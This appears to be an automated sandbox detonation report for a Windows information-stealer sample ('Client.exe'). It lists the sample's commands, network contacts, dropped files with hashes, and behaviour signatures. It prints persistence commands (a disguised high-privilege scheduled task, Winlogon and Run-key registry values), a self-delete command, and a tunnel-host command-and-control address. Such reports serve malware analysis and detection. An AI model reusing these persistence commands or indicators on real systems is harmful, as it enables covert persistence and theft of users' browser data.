"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 2.17.107.131:443 www.bing.com tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 131.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 147.185.221.20:6858 mature-viewers.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.73.50.20.in-addr.arpa udp

Files

memory/2516-1-0x00007FFA13603000-0x00007FFA13605000-memory.dmp

memory/2516-0-0x00000000001F0000-0x0000000000248000-memory.dmp

memory/2228-2-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-3-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-4-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-8-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-14-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-13-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-12-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-11-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-10-0x000002AECE460000-0x000002AECE461000-memory.dmp

memory/2228-9-0x000002AECE460000-0x000002AECE461000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 6bd369f7c74a28194c991ed1404da30f
SHA1 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 d2fb266b97caff2086bf0fa74eddb6b2
SHA1 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256 b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512 c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

C:\Windows\xdwd.dll

MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

memory/2516-74-0x000000001D030000-0x000000001D0A6000-memory.dmp

memory/2516-75-0x0000000002330000-0x000000000233C000-memory.dmp

memory/2516-76-0x0000000002580000-0x000000000259E000-memory.dmp

memory/2516-90-0x00007FFA13603000-0x00007FFA13605000-memory.dmp

memory/2516-92-0x000000001D1B0000-0x000000001D2F6000-memory.dmp

memory/2516-191-0x0000000002340000-0x000000000234A000-memory.dmp

memory/2200-194-0x0000027A7F260000-0x0000027A7F282000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ds0fpfk.msq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/2516-238-0x00000000009C0000-0x00000000009CC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe

MD5 a77ad875932600ec52af6a1ea7fc65ae
SHA1 f5ee833f1ab363e5dd70526dd618b92d86c77f80
SHA256 20c99e2aa0de86267ed7d713c90ab281fec37ec6fd10e624042b520ed8ca0ae3
SHA512 c1612cf79cd6557e92502ddb0c222e34c077169bb61be5c37c6c203fb3b0894cbf897dea59b246a54a02d53bb589d21a231060b70416f478ae2ac8ab1ef3759c

memory/4872-256-0x0000023621100000-0x0000023621140000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c5348f7d6ae5ae4f688df9f8481823d
SHA1 6ee5b8fcff32e3f790b30ca145c13375aa6dae0d
SHA256 092b25fe912599ec5c4457f26a7160ebfa98551abb663e5f96158ebaab13034b
SHA512 041122db23f35dfce15a5a330fde4612692bace13d1d30843690a0b1b604946e32191221527ba0115e471e2a15ada135765aa87d62d47b0d65a0da4edb71d9bb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

memory/4872-288-0x000002363B830000-0x000002363B880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39c2ac09b52b0685c7da5b25746d8a64
SHA1 c0ac1559da69dc9ad0496c11ce37ef9b907ea656
SHA256 c582429e23c81918907db9c7f32bef2d32c873f2da84fa450707482408e3a160
SHA512 9a6f4c5944cecdd6cf2114f7db583e4742a93b3c9eec6fd60328585370a8ba2f917f7ce689c0341d2dbf391f58ff34ee0088d9d2158ebb2450c547257da095a1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 548dd08570d121a65e82abb7171cae1c
SHA1 1a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256 cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA512 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1726a06b1e2471258cc0d0da880b0734
SHA1 e03d53ceff0137aa8932334571c6e2988b475d14
SHA256 4298c061a28200fcd3211c61842f4f39410158753938151756c19367eefc58be
SHA512 ff9c7a556993d23123845407eb1dc3c0586eac692a877aa784fb577ceb381fd4700fa0b397a9276aa1da633704769005425344ecf485bae4f0793c365509a92c

memory/4872-344-0x0000023622DF0000-0x0000023622DFA000-memory.dmp

memory/4872-345-0x000002363B930000-0x000002363B942000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ae85c1e4a8a5415e57b3ac516f2964bf
SHA1 8be3f0538f41d24afaf47c2a6c1764b954190e8a
SHA256 9fed6a56624cf895c26311a19f3c1a0a78c0b92c00ae626d8492f2bf418f269f
SHA512 b47558e9977ea42395ddba0d3eefcc4d8a0d6c0bd8e9639ecedc9ae10834f3ab2c91827ecd0deaa2c2341f9612655776cc3ad8a34f0f7f020d3efc24f00c2cd8

C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu.ligma

MD5 47a21e82f9b46d893d49273b4dc84a70
SHA1 2802fa59ca7df9024495dd471bc45a0767647bb7
SHA256 539a6d338b9671479edd07178032deade637bc2cd10b5a150da1b9787d3e6da9
SHA512 9238b641f6ecb7271edaa59d776f86bd0edbbb3ed574b5c86e28d9b2932f53609abac33bb5b5f0973e30d4750f8502ca0b09f6f909fe94488a1f909d6ea0de68

C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu\Display\Display.png

MD5 26355da9122dbf8403f7e0ab42d713fc
SHA1 ea3d02af9cebf68b0dd16ffc2548c67693aaf1ad
SHA256 69b75d9c5af2143eb39997618fa5fcef0f91506d197336db6a9e7fc557832617
SHA512 1b9fdb382285b251eefdf178f4ab10ff7d6199faf15e0082c47499329a45e85ffc7213e31c01d26a0b5bb656cf78fc26cc2cf7074aa631c465bbd7314913a7dc

C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu\Browsers\Cookies\Chrome Cookies.txt

MD5 2d66d955e6d676db89116d677757832f
SHA1 4376d860e74a7a3caaccdb68007d48c16b349e3c
SHA256 0acd7f6f1a4d35d224b253e5d59462e5d336dd022992b2acad2e81e18c61d954
SHA512 42266d0023cb054e5f18f4d06ff7e0900e611d0d6e0894b8d9e1fc67338d59ccd630a39fe568e80a280cb2f7b879a679dfa03838fcbe1d5ed5552a60e8d10d63

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x5drfucs.3zw.exe.log

MD5 547df619456b0e94d1b7663cf2f93ccb
SHA1 8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3
SHA256 8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a
SHA512 01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 14:34

Reported

2024-06-15 14:37

Platform

win11-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\xdwdMicrosoft Azure DevOps.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies AppInit DLL entries

persistence

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A (32 identical rows)

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Local\\xdwdGreenshot.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A (34 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2348 wrote to memory of 4280 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2348 wrote to memory of 4280 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3416 wrote to memory of 3720 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3416 wrote to memory of 3720 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4572 wrote to memory of 4792 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4572 wrote to memory of 4792 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4076 wrote to memory of 3692 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4076 wrote to memory of 3692 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4060 wrote to memory of 4260 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 4260 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2036 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2036 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2268 wrote to memory of 2416 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2268 wrote to memory of 2416 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1416 wrote to memory of 1580 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1416 wrote to memory of 1580 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3676 wrote to memory of 2916 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3676 wrote to memory of 2916 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3436 wrote to memory of 3908 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3436 wrote to memory of 3908 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4204 wrote to memory of 3348 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
